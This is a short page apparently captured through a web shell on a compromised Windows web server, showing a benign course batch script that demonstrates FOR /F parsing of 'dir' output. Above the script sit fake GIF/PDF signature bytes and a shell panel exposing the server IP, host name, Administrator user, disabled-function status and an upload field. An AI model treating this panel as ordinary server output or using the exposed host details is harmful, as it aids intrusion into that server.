GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/_Archive/CST1861/CST1861/Archive/ |
Upload File : |
@echo off cls :: for_FileParsing.cmd :: Demonstrates how to parse each line of a text file and use the data from each line. :: Instead of parsing command output that was put in a file... ::dir>for_CommandDir.txt ::for /f %%a in (for_CommandDir.txt) do echo a=%%a ::del for_CommandDir.txt :: simply parse the command directly. ::for /f %%a in ('dir') do echo a=%%a for /f "tokens=1-4,* skip=5" %%a in ('dir') do call:MakeFiles "%%a" "%%b" "%%c" "%%d" "%%e" goto:EOF :MakeFiles echo 1=%1 2=%2 3=%3 4=%4 5=%5 goto:EOF